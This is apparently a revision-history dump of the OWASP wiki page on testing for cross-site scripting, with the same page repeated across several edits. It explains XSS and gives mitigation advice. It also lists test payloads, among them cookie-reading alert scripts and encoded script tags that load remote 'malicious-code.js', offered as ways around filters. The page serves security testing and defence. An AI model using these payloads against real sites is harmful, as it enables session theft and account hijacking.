* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
* Amit Klien: DOM Based Cross Site Scripting - http://www.securiteam.com/securityreviews/5MP080KGKW.html<br />
<br />
* Jeremiah Grossman: Hacking Intranet Websites from the Outside "JavaScript malware just got a lot more dangerous" - http://www.blackhat.com/presentations/bh-jp-06/BH-JP-06-Grossman.pdf<br />
<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13660Testing for Cross site scripting2006-11-24T19:07:11Z<p>TomRyan: /* Gray Box testing and example */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
<br />
''Example 2:''<br />
<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13659Testing for Cross site scripting2006-11-24T19:06:12Z<p>TomRyan: /* Gray Box testing and example */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
<br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
''Example 2:''<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13658Testing for Cross site scripting2006-11-24T19:04:27Z<p>TomRyan: /* Gray Box testing and example */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
When you know certain types of countermeasures have been applied to code, you may want to try some tactics like this:<br />
<br />
''Example 1:''<br />
Since JavaScript is case sensitive, some people convert all characters to upper case, trying to render Cross Site Scripting useless. If this is the case, you may want to use VBScript.<br />
<br />
JavaScript: <script>alert(document.cookie);</script><br />
VBScript: <script type="text/vbscript">alert(DOCUMENT.COOKIE)</script><br />
<br />
''Example 2:''<br />
If they are filtering for the < or the open of <script or closing of script> you should try various methods of encoding:<br />
<br />
<script src=http://www.owasp.org/malicious-code.js></script><br />
<br />
%3cscript src=http://www.owasp.org/malicious-code.js%3e%3c/script%3e<br />
<br />
\x3cscript src=http://www.owasp.org/malicious-code.js\x3e\x3c/script\x3e<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyanhttps://wiki.owasp.org/index.php?title=Testing_for_Cross_site_scripting&diff=13657Testing for Cross site scripting2006-11-24T19:01:59Z<p>TomRyan: /* Brief Summary */</p>
<hr />
<div>[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]<br><br />
{{Template:OWASP Testing Guide v2}}<br />
<br />
== Brief Summary ==<br />
Cross Site Scripting is one of the most common application level attacks. Many times people will look at a Cross Site Scripting (also known as XSS, CSS was avoided not to confuse people with Cascade Styling Sheets) attack and say WOW you made a JavaScript popup window, but how does this effect me?<br />
<br />
Cross Site Scripting vulnerabilities are essentially code injection attacks. These attacks can be carried out using HTML, JavaScript, VBScript, ActiveX, Flash and other client-side languages. These attacks also have the ability to gather data from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible. In some cases Cross Site Scripting vulnerabilities can even perform other functions such as scanning for other vulnerabilities and performing a Denial of Service on your web server.<br />
<br />
Furthermore, we will provide more detailed information about the three types of Cross Site Scripting vulnerabilities, DOM-Based, Stored and Reflected.<br />
<br />
== Description of the Issue ==<br />
<br />
Cross site scripting is an attack on the privacy of clients of a particular web site which can lead to a total breach of security when customer details are stolen or manipulated. Unlike most attacks, which involve two parties – the attacker, and the web site, or the attacker and the victim client, the CSS attack involves three parties – the attacker, a client and the web site. The goal of the CSS attack is to steal the client cookies, or any other sensitive information, which can authenticate the client to the web site. With the token of the legitimate user at hand, the attacker can proceed to act as the user in his/her interaction with the site –specifically, impersonate the user. - Identity theft!<br />
<br />
Online message boards, web logs, guestbooks, and user forums where messages can be permanently stored also facilitate Cross-Site Scripting attacks. In these cases, an attacker can post a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the user once they click the link. Attackers can use a wide-range of encoding techniques to hide or obfuscate the malicious script and, in some cases, can avoid explicit use of the <Script> tag. Typically, XSS attacks involve malicious JavaScript, but it can also involve any type of executable active content. Although the types of attacks vary in sophistication, there is a generally reliable method to detect XSS vulnerabilities.<br />
Cross site scripting is used in many Phishing attacks.<br />
<br />
==Black Box testing and example==<br />
<br />
One way to test for XSS vulnerabilities is to verify whether an application or web server will respond to requests containing simple scripts with an HTTP response that could be executed by a browser. For example, Sambar Server (version 5.3) is a popular freeware web server with known XSS vulnerabilities. Sending the server a request such as the following generates a response from the server that will be executed by a web browser:<BR><br />
<br />
'''/testcgi.exe?<SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT>'''<br />
<br />
The script is executed by the browser because the application generates an error message containing the original script, and the browser interprets the response as an executable script originating from the server.<br />
All web servers and web applications are potentially vulnerable to this type of misuse, and preventing such attacks is extremely difficult. Consider implementing the following recommendations if one or more XSS vulnerabilities have been detected in your application<br />
<br />
The following general recommendations can help mitigate the risk associated with Cross-Site Scripting vulnerabilities. This is a complex problem area so there is no one simple fix or solution:<br />
* Ensure that your web application validates all forms, headers, cookie fields, hidden fields, and parameters, and converts scripts and script tags to a non-executable form.<br />
* Ensure that any executables on your server do not return scripts in executable form when passed scripts as malformed command parameters.<br />
* Consider converting JavaScript and HTML tags into alternate HTML encodings (such as “<” to “&lt;>.<br />
* If your site runs online forums or message boards, disallow the use of HTML tags and Scripting in these areas.<br />
* Keep up with the latest security vulnerabilities and bugs for all production applications and servers.<br />
* Update your production servers with the latest XSS vulnerabilities by downloading current patches, and perform frequent security audits on all deployed applications.<br />
The root cause of Cross-Site Scripting is a failure to filter hazardous characters from web application input and output. The two most critical programming practices you can institute to guard against Cross-Site Scripting are:<br />
* Validate Input<br />
* Encode output<br />
Always filter data originating from outside your application by disallowing the use of special characters. Only display output to the browser that has been sufficiently encoded. When possible, avoid simple character filters and write routines that validate user input against a set of allowed, safe characters. Use regular expressions to confirm that data conforms to the allowed character set. This enhances application security and makes it harder to bypass input validation routines.<br />
There are different tools you can use to validate and encode your data, depending upon your development environment. Your goal in remediating Cross-Site Scripting attacks is to filter and encode all potentially dangerous characters so that the application does not return data that the browser will interpret as executable. Any unescaped or unecoded data that is returned to the browser is a potential security risk.<br />
The following characters can be harmful and should be filtered whenever they appear in the application input or output. In output, you should translate these characters to their HTML equivalents before returning data to the browser.<BR><br />
'''> < ( ) [ ] ' " ; : / |'''<br />
<br />
<b>PHP</b><br />
The following PHP functions help mitigate Cross-Site Scripting Vulnerabilities:<br />
* '''Strip_tags()''' removes HTML and PHP scripting tags from a string.<br />
* '''Utf8_decode()''' converts UTF-8 encoding to single byte ASCII characters. Decoding Unicode input prior to filtering it can help you detect attacks that the attacker has obfuscated with Unicode encoding.<br />
* '''Htmlspecialcharacters()''' turns characters such as '''&,>,<,”''' into their HTML equivalents. Converting special characters to HTML prevents them from being executed within browsers when outputted by an application.<br />
* '''Strtr()''' filters any characters you specify. Make sure to filter “; : ( )” characters so that attackers cannot craft strings that generate alerts. Many XSS attacks are possible without the use of HTML characters, so filtering and encoding parentheses mitigates these attacks.<BR>For example:<br />
'''" style="background:url(JavaScript:alert(Malicious Content));'''<br />
<br />
<b>ASP.NET</b><br />
With ASP.NET, you can use the following functions to help prevent Cross-Site Scripting:<br />
* Constrain input submitted via server controls by using ASP.NET validater controls, such as '''RegularExpressionValidator''', '''RangeValidator''', and '''System.Text.RegularExpression.Regex'''. Using these methods as server-side controls to limit data input to only allowable character sequences by validating input type, length, format, and character range.<br />
* Use the '''HtmlUtility.HtmlEncode''' method to encode data if it originates from either a user or from a database. HtmlEncode replaces special characters with their HTML equivalents, thus preventing the output from being executable in the browser. Use HtmlUtility.UrlEncode when writing URLs that may have originated from user input or stored database information.<br />
* Use the '''HttpOnly cookie''' option for added protection.<br />
* As a best practice, you should use regular expressions to constrain input to known safe characters. Do not rely solely on ASP.NET validateRequest, but use it in addition to your other input validation and encoding mechanisms.<br />
<br />
<br />
== Gray Box testing and example ==<br />
<br />
<br />
== References ==<br />
<br />
'''Whitepapers'''<br><br />
* Paul Lindner: "Preventing Cross-site Scripting Attacks" - http://www.perl.com/pub/a/2002/02/20/css.html<br />
<br />
* CERT: "CERT Advisory CA-2000-02 Malicious HTML Tags Embedded in Client Web Requests" - http://www.cert.org/advisories/CA-2000-02.html<br />
<br />
* RSnake: "XSS (Cross Site Scripting) Cheat Sheet" - http://ha.ckers.org/xss.html<br />
<br />
'''Tools'''<br><br />
* '''OWASP CAL9000''' - http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project<br><br />
** CAL9000 includes a sortable implementation of RSnake's XSS Attacks, Character Encoder/Decoder, HTTP Request Generator and Response Evaluator, Testing Checklist, Automated Attack Editor and much more. <br />
<br />
<br><br />
{{Category:OWASP Testing Project AoC}}</div>TomRyan